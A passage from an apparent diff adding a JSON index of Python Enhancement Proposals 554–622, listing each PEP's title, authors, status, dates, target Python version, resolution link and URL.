"https://discuss.python.org/t/pep-554-multiple-interpreters-in-the-stdlib/24855", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.13", + "post_history": "`07-Sep-2017 `__, `08-Sep-2017 `__, `13-Sep-2017 `__, `05-Dec-2017 `__, `04-May-2020 `__, `14-Mar-2023 `__, `01-Nov-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "734", + "url": "https://peps.python.org/pep-0554/" + }, + "555": { + "number": 555, + "title": "Context-local variables (contextvars)", + "authors": "Koos Zevenhoven", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Sep-2017", + "python_version": "3.7", + "post_history": "06-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0555/" + }, + "556": { + "number": 556, + "title": "Threaded garbage collection", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0556/" + }, + "557": { + "number": 557, + "title": "Data Classes", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151034.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0557/" + }, + "558": { + "number": 558, + "title": "Defined semantics for locals()", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.13", + "post_history": "08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, 26-Aug-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0558/" + }, + "559": { + "number": 559, + "title": "Built-in noop()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149438.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0559/" + }, + "560": { + "number": 560, + "title": "Core support for typing module and generic types", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017, 14-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151038.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0560/" + }, + "561": { + "number": 561, + "title": "Distributing and Packaging Type Information", + "authors": "Ethan Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging, typing", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0561/" + }, + "562": { + "number": 562, + "title": "Module __getattr__ and __dir__", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0562/" + }, + "563": { + "number": 563, + "title": "Postponed Evaluation of Annotations", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "01-Nov-2017, 21-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151042.html", + "requires": null, + "replaces": null, + "superseded_by": "649", + "url": "https://peps.python.org/pep-0563/" + }, + "564": { + "number": 564, + "title": "Add new time functions with nanosecond resolution", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2017", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/150046.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0564/" + }, + "565": { + "number": 565, + "title": "Show DeprecationWarning in __main__", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2017", + "python_version": "3.7", + "post_history": "12-Nov-2017, 25-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151224.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0565/" + }, + "566": { + "number": 566, + "title": "Metadata for Python Software Packages 2.1", + "authors": "Dustin Ingram", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Dec-2017", + "python_version": "3.x", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-February/032014.html", + "requires": null, + "replaces": "345", + "superseded_by": null, + "url": "https://peps.python.org/pep-0566/" + }, + "567": { + "number": 567, + "title": "Context Variables", + "authors": "Yury Selivanov", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2017", + "python_version": "3.7", + "post_history": "12-Dec-2017, 28-Dec-2017, 16-Jan-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0567/" + }, + "568": { + "number": 568, + "title": "Generator-sensitivity for Context Variables", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0568/" + }, + "569": { + "number": 569, + "title": "Python 3.8 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0569/" + }, + "570": { + "number": 570, + "title": "Python Positional-Only Parameters", + "authors": "Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele", + "discussions_to": "https://discuss.python.org/t/pep-570-python-positional-only-parameters/1078", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0570/" + }, + "571": { + "number": 571, + "title": "The manylinux2010 Platform Tag", + "authors": "Mark Williams, Geoffrey Thomas, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "05-Feb-2018", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-April/032156.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0571/" + }, + "572": { + "number": 572, + "title": "Assignment Expressions", + "authors": "Chris Angelico, Tim Peters, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Feb-2018", + "python_version": "3.8", + "post_history": "28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, 25-Apr-2018, 09-Jul-2018, 05-Aug-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2018-July/154601.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0572/" + }, + "573": { + "number": 573, + "title": "Module State Access from C Extension Methods", + "authors": "Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2016", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0573/" + }, + "574": { + "number": 574, + "title": "Pickle protocol 5 with out-of-band data", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2018", + "python_version": "3.8", + "post_history": "28-Mar-2018, 30-Apr-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157284.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0574/" + }, + "575": { + "number": 575, + "title": "Unifying function/method classes", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2018", + "python_version": "3.8", + "post_history": "31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0575/" + }, + "576": { + "number": 576, + "title": "Rationalize Built-in function classes", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "10-May-2018", + "python_version": "3.8", + "post_history": "17-May-2018, 23-Jun-2018, 08-Jul-2018, 29-Mar-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0576/" + }, + "577": { + "number": 577, + "title": "Augmented Assignment Expressions", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-May-2018", + "python_version": "3.8", + "post_history": "22-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0577/" + }, + "578": { + "number": 578, + "title": "Python Runtime Audit Hooks", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2018", + "python_version": "3.8", + "post_history": "28-Mar-2019, 07-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0578/" + }, + "579": { + "number": 579, + "title": "Refactoring C functions and methods", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Jun-2018", + "python_version": null, + "post_history": "20-Jun-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0579/" + }, + "580": { + "number": 580, + "title": "The C call protocol", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jun-2018", + "python_version": "3.8", + "post_history": "20-Jun-2018, 22-Jun-2018, 16-Jul-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0580/" + }, + "581": { + "number": 581, + "title": "Using GitHub Issues for CPython", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/535", + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Jun-2018", + "python_version": null, + "post_history": "07-Mar-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157399.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0581/" + }, + "582": { + "number": 582, + "title": "Python local packages directory", + "authors": "Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "16-May-2018", + "python_version": "3.12", + "post_history": "`01-Mar-2019 `__,", + "resolution": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/430", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0582/" + }, + "583": { + "number": 583, + "title": "A Concurrency Memory Model for Python", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "22-Mar-2008", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0583/" + }, + "584": { + "number": 584, + "title": "Add Union Operators To dict", + "authors": "Steven D'Aprano, Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2019", + "python_version": "3.9", + "post_history": "01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, 17-Feb-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6KT2KIOTYXMDCD2CCAOLOI7LUGTN6MBS", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0584/" + }, + "585": { + "number": 585, + "title": "Type Hinting Generics In Standard Collections", + "authors": "\u0141ukasz Langa", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Mar-2019", + "python_version": "3.9", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/HW2NFOEMCVCTAFLBLC3V7MLM6ZNMKP42/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0585/" + }, + "586": { + "number": 586, + "title": "Literal Types", + "authors": "Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Mar-2019", + "python_version": "3.8", + "post_history": "14-Mar-2019", + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0586/" + }, + "587": { + "number": 587, + "title": "Python Initialization Configuration", + "authors": "Victor Stinner, Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0587/" + }, + "588": { + "number": 588, + "title": "GitHub Issues Migration Plan", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/13791", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Mar-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0588/" + }, + "589": { + "number": 589, + "title": "TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys", + "authors": "Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "20-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0589/" + }, + "590": { + "number": 590, + "title": "Vectorcall: a fast calling protocol for CPython", + "authors": "Mark Shannon, Jeroen Demeyer", + "discussions_to": null, + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0590/" + }, + "591": { + "number": 591, + "title": "Adding a final qualifier to typing", + "authors": "Michael J. Sullivan, Ivan Levkivskyi", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0591/" + }, + "592": { + "number": 592, + "title": "Adding \"Yank\" Support to the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/1629", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "07-May-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-592-support-for-yanked-files-in-the-simple-repository-api/1629/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0592/" + }, + "593": { + "number": 593, + "title": "Flexible function and variable annotations", + "authors": "Till Varoquaux, Konstantin Kashin", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "26-Apr-2019", + "python_version": "3.9", + "post_history": "20-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0593/" + }, + "594": { + "number": 594, + "title": "Removing dead batteries from the standard library", + "authors": "Christian Heimes, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/13508", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-May-2019", + "python_version": "3.11", + "post_history": "21-May-2019, 04-Feb-2022", + "resolution": "https://discuss.python.org/t/13508/22", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0594/" + }, + "595": { + "number": 595, + "title": "Improving bugs.python.org", + "authors": "Ezio Melotti, Berker Peksag", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "12-May-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0595/" + }, + "596": { + "number": 596, + "title": "Python 3.9 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0596/" + }, + "597": { + "number": 597, + "title": "Add optional EncodingWarning", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2019", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0597/" + }, + "598": { + "number": 598, + "title": "Introducing incremental feature releases", + "authors": "Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "15-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0598/" + }, + "599": { + "number": 599, + "title": "The manylinux2014 Platform Tag", + "authors": "Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "29-Apr-2019", + "python_version": null, + "post_history": "29-Apr-2019", + "resolution": "https://discuss.python.org/t/the-next-manylinux-specification/1043/199", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0599/" + }, + "600": { + "number": 600, + "title": "Future 'manylinux' Platform Tags for Portable Linux Built Distributions", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "03-May-2019", + "python_version": null, + "post_history": "03-May-2019", + "resolution": "https://discuss.python.org/t/pep-600-future-manylinux-platform-tags-for-portable-linux-built-distributions/2414/27", + "requires": null, + "replaces": "513, 571, 599", + "superseded_by": null, + "url": "https://peps.python.org/pep-0600/" + }, + "601": { + "number": 601, + "title": "Forbid return/break/continue breaking out of finally", + "authors": "Damien George, Batuhan Taskaya", + "discussions_to": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2019", + "python_version": "3.8", + "post_history": "26-Aug-2019, 23-Sep-2019", + "resolution": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239/32", + "requires": null, + "replaces": null, + "superseded_by": "765", + "url": "https://peps.python.org/pep-0601/" + }, + "602": { + "number": 602, + "title": "Annual Release Cycle for Python", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-602-annual-release-cycle-for-python/2296/", + "status": "Active", + "type": "Process", + "topic": "", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": "`09-Oct-2023 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/KE7OS4PZASZMFTW2FP2MWZU5R4Q2QZKU/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0602/" + }, + "603": { + "number": 603, + "title": "Adding a frozenmap type to collections", + "authors": "Yury Selivanov", + "discussions_to": "https://discuss.python.org/t/pep-603-adding-a-frozenmap-type-to-collections/2318/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2019", + "python_version": null, + "post_history": "12-Sep-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0603/" + }, + "604": { + "number": 604, + "title": "Allow writing union types as ``X | Y``", + "authors": "Philippe PRADOS, Maggie Moss", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2019", + "python_version": "3.10", + "post_history": "28-Aug-2019, 05-Aug-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0604/" + }, + "605": { + "number": 605, + "title": "A rolling feature release stream for CPython", + "authors": "Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-605-a-rolling-feature-release-stream-for-cpython/2418", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "20-Sep-2019", + "python_version": "3.9", + "post_history": "01-Oct-2019, 06-Oct-2019, 20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0605/" + }, + "606": { + "number": 606, + "title": "Python Compatibility Version", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0606/" + }, + "607": { + "number": 607, + "title": "Reducing CPython's Feature Delivery Latency", + "authors": "\u0141ukasz Langa, Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-607-shared-background-for-the-release-cadence-peps/2528", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2019", + "python_version": "3.9", + "post_history": "20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0607/" + }, + "608": { + "number": 608, + "title": "Coordinated Python release", + "authors": "Miro Hron\u010dok, Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0608/" + }, + "609": { + "number": 609, + "title": "Python Packaging Authority (PyPA) Governance", + "authors": "Dustin Ingram, Pradyun Gedam, Sumana Harihareswara", + "discussions_to": "https://discuss.python.org/t/pep-609-pypa-governance/2619", + "status": "Active", + "type": "Process", + "topic": "governance, packaging", + "created": "05-Nov-2019", + "python_version": null, + "post_history": "05-Nov-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0609/" + }, + "610": { + "number": 610, + "title": "Recording the Direct URL Origin of installed distributions", + "authors": "St\u00e9phane Bidoul, Chris Jerdonek", + "discussions_to": "https://discuss.python.org/t/recording-the-source-url-of-an-installed-distribution/1535", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Apr-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/1535/56", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0610/" + }, + "611": { + "number": 611, + "title": "The one million limit", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Dec-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0611/" + }, + "612": { + "number": 612, + "title": "Parameter Specification Variables", + "authors": "Mark Mendoza", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "18-Dec-2019", + "python_version": "3.10", + "post_history": "18-Dec-2019, 13-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0612/" + }, + "613": { + "number": 613, + "title": "Explicit Type Aliases", + "authors": "Shannon Zhu", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/MWRJOBEEEMFVXE7CAKO7B4P46IPM4AN3/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "21-Jan-2020", + "python_version": "3.10", + "post_history": "21-Jan-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0613/" + }, + "614": { + "number": 614, + "title": "Relaxing Grammar Restrictions On Decorators", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2020", + "python_version": "3.9", + "post_history": "11-Feb-2020, 18-Feb-2020, 03-Mar-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VSR66MOTCDCY7ZFH4IG7QVFI2JXQQZQ5", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0614/" + }, + "615": { + "number": 615, + "title": "Support for the IANA Time Zone Database in the Standard Library", + "authors": "Paul Ganssle", + "discussions_to": "https://discuss.python.org/t/3468", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2020", + "python_version": "3.9", + "post_history": "25-Feb-2020, 29-Mar-2020", + "resolution": null, + "requires": null, + "replaces": "431", + "superseded_by": null, + "url": "https://peps.python.org/pep-0615/" + }, + "616": { + "number": 616, + "title": "String methods to remove prefixes and suffixes", + "authors": "Dennis Sweeney", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Mar-2020", + "python_version": "3.9", + "post_history": "20-Mar-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0616/" + }, + "617": { + "number": 617, + "title": "New PEG parser for CPython", + "authors": "Guido van Rossum, Pablo Galindo, Lysandros Nikolaou", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Mar-2020", + "python_version": "3.9", + "post_history": "02-Apr-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0617/" + }, + "618": { + "number": 618, + "title": "Add Optional Length-Checking To zip", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2020", + "python_version": "3.10", + "post_history": "01-May-2020, 10-May-2020, 16-Jun-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NLWB7FVJGMBBMCF4P3ZKUIE53JPDOWJ3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0618/" + }, + "619": { + "number": 619, + "title": "Python 3.10 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "25-May-2020", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0619/" + }, + "620": { + "number": 620, + "title": "Hide implementation details from the C API", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2020", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0620/" + }, + "621": { + "number": 621, + "title": "Storing project metadata in pyproject.toml", + "authors": "Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, S\u00e9bastien Eustace, Thomas Kluyver, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/pep-621-round-3/5472", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Jun-2020", + "python_version": null, + "post_history": "22-Jun-2020, 18-Oct-2020, 24-Oct-2020, 31-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-621-round-3/5472/109", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0621/" + }, + "622": { + "number": 622, + "title": "Structural Pattern Matching", + "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin", + "discussions_to": "python-dev@python.org", + "status": 